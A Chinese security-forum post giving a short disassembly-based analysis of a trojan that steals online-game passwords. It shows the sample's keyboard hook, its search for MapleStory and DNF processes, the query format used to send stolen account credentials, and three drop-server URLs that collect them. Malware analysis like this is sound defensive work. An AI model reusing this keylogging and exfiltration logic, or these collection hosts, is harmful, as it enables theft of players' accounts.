好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
病毒名称:Psw.OnlineGames
病毒类型: 特洛伊木马
文件 MD5:34e9fe75d59053fcddc92b88ab1cc012
公开范围: 完全公开
危害等级:3
文件长度:55,296 字节
OD简单分析:
1、初始:
1000C85F 56 push esi
1000C860 8B7424 08 mov esi,dword ptr ss:[esp+8]
1000C864 56 push esi
1000C865 FF15 68100010 call dword ptr ds:[10001068] ; kernel32.DisableThreadLibraryCalls
1000C86B 8B4424 0C mov eax,dword ptr ss:[esp+C]
1000C86F 83E8 00 sub eax,0
1000C872 74 10 je short cao110_d.1000C884
1000C874 48 dec eax
1000C875 75 41 jnz short cao110_d.1000C8B8
1000C877 8935 64E80010 mov dword ptr ds:[1000E864],esi
1000C87D E8 37FFFFFF call cao110_d.1000C7B9 ; 关键call
2、获得系统版本:
1000C6C5 55 push ebp
1000C6C6 8BEC mov ebp,esp
1000C6C8 81EC A0010000 sub esp,1A0
1000C6CE 6A 61 push 61
1000C6D0 FF15 C8100010 call dword ptr ds:[100010C8] ; USER32.VkKeyScanA
1000C6D6 66:3D 4100 cmp ax,41
1000C6DA 74 01 je short cao110_d.1000C6DD
1000C6DC CC int3
1000C6DD 56 push esi
1000C6DE 57 push edi
1000C6DF BE 9C000000 mov esi,9C
1000C6E4 33FF xor edi,edi
1000C6E6 56 push esi
1000C6E7 8D85 64FFFFFF lea eax,dword ptr ss:[ebp-9C]
1000C6ED 57 push edi
1000C6EE 50 push eax
1000C6EF E8 C6020000 call cao110_d.1000C9BA
1000C6F4 8D85 64FFFFFF lea eax,dword ptr ss:[ebp-9C]
1000C6FA 89B5 64FFFFFF mov dword ptr ss:[ebp-9C],esi
1000C700 8B35 64100010 mov esi,dword ptr ds:[10001064] ; kernel32.GetVersionExA
3、获得系统目录,打开explorer,获得大小后关闭句柄
1000C74A 68 04010000 push 104
1000C74F 50 push eax
1000C750 FF15 60100010 call dword ptr ds:[10001060] ; kernel32.GetWindowsDirectoryA
1000C756 8D85 60FEFFFF lea eax,dword ptr ss:[ebp-1A0]
1000C75C 68 64A60010 push cao110_d.1000A664 ; ASCII "\explorer.exe"
1000C761 50 push eax
1000C762 E8 0A020000 call cao110_d.1000C971
1000C767 57 push edi
1000C768 68 80000000 push 80
1000C76D 6A 03 push 3
1000C76F 57 push edi
1000C770 6A 01 push 1
1000C772 8D85 60FEFFFF lea eax,dword ptr ss:[ebp-1A0]
1000C778 68 00000080 push 80000000
1000C77D 50 push eax
1000C77E FF15 4C100010 call dword ptr ds:[1000104C] ; kernel32.CreateFileA
1000C784 8BF0 mov esi,eax
1000C786 83FE FF cmp esi,-1
1000C789 74 1E je short cao110_d.1000C7A9
1000C78B 57 push edi
1000C78C 56 push esi
1000C78D FF15 5C100010 call dword ptr ds:[1000105C] ; kernel32.GetFileSize
1000C793 56 push esi
1000C794 8BF8 mov edi,eax
1000C796 FF15 8C100010 call dword ptr ds:[1000108C] ; kernel32.CloseHandle
4、开始找游戏进程:冒险岛,DNF,winbaram(不知道这个是啥游戏)
1000B9B7 81EC 04010000 sub esp,104
1000B9BD 56 push esi
1000B9BE 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
1000B9C4 68 04010000 push 104
1000B9C9 50 push eax
1000B9CA 8BF1 mov esi,ecx
1000B9CC 6A 00 push 0
1000B9CE FF15 14100010 call dword ptr ds:[10001014] ; kernel32.GetModuleFileNameA
1000B9D4 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
1000B9DA 6A 5C push 5C
1000B9DC 50 push eax
1000B9DD E8 4A0F0000 call cao110_d.1000C92C
1000B9E2 40 inc eax
1000B9E3 68 E8120010 push cao110_d.100012E8 ; ASCII "maplestory.exe"(冒险岛进程)
用的比较多的字符串比较:
1000C8C9 40 inc eax
1000C8CA 803C08 00 cmp byte ptr ds:[eax+ecx],0
1000C8CE ^ 75 F9 jnz short cao110_d.1000C8C9
5、设置键盘钩子 发送到asp地址
键盘钩子创建消息:
1000B8BC 6A 00 push 0
1000B8BE FF35 5CE70010 push dword ptr ds:[1000E75C] ; dumped_.10000000
1000B8C4 68 B0B60010 push dumped_.1000B6B0
1000B8C9 6A 02 push 2
1000B8CB FF15 C0100010 call dword ptr ds:[<&user32.SetWindowsHo>; USER32.SetWindowsHookExA
1000B8D1 A3 F4E60010 mov dword ptr ds:[1000E6F4],eax
冒险岛:http://www.gwlove123.com/small/mxd/lin.asp
DNF:http://www.gwlove123.com/small/df/lin.asp
FZ:http://www.zdd2626.net/test/fz/lin.asp
1000B04D 50 push eax
1000B04E E8 EE1A0000 call dumped_.1000CB41
1000B053 85C0 test eax,eax
1000B055 0F84 8A000000 je dumped_.1000B0E5
1000B05B 381D 84E20010 cmp byte ptr ds:[1000E284],bl
1000B061 BF 84E20010 mov edi,dumped_.1000E284
1000B066 BE 64E10010 mov esi,dumped_.1000E164
1000B06B 75 32 jnz short dumped_.1000B09F
1000B06D 381D 64E10010 cmp byte ptr ds:[1000E164],bl
1000B073 75 2A jnz short dumped_.1000B09F
1000B075 8D45 80 lea eax,dword ptr ss:[ebp-80]
1000B078 50 push eax
1000B079 FF35 70110010 push dword ptr ds:[10001170] ; dumped_.1000117C
1000B07F E8 C31B0000 call dumped_.1000CC47
1000B084 85C0 test eax,eax
1000B086 74 5D je short dumped_.1000B0E5
1000B088 8D45 80 lea eax,dword ptr ss:[ebp-80]
1000B08B 50 push eax
1000B08C 57 push edi
1000B08D E8 8E210000 call dumped_.1000D220
1000B092 8D45 A0 lea eax,dword ptr ss:[ebp-60]
1000B095 50 push eax
1000B096 56 push esi
1000B097 E8 84210000 call dumped_.1000D220
1000B09C 83C4 10 add esp,10
1000B09F 381D A4E20010 cmp byte ptr ds:[1000E2A4],bl
1000B0A5 75 05 jnz short dumped_.1000B0AC
1000B0A7 E8 01020000 call dumped_.1000B2AD
1000B0AC 68 ECE20010 push dumped_.1000E2EC
1000B0B1 56 push esi
1000B0B2 57 push edi
1000B0B3 68 A4E20010 push dumped_.1000E2A4
1000B0B8 8D85 7CFEFFFF lea eax,dword ptr ss:[ebp-184]
1000B0BE 68 C4E20010 push dumped_.1000E2C4
1000B0C3 50 push eax
1000B0C4 8D85 7CFAFFFF lea eax,dword ptr ss:[ebp-584]
1000B0CA 68 E4110010 push dumped_.100011E4 ; ASCII "%s?a=%s&s=%s&u=%s&p=%s&sp=%s";发送格式
1000B0CF 50 push eax
1000B0D0 FF15 CC100010 call dword ptr ds:[<&user32.wsprintfA>] ; USER32.wsprintfA
ps:简单分析,如有失误,请多多指点。o(∩_∩)o... |
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
发表于 2009-11-9 13:55
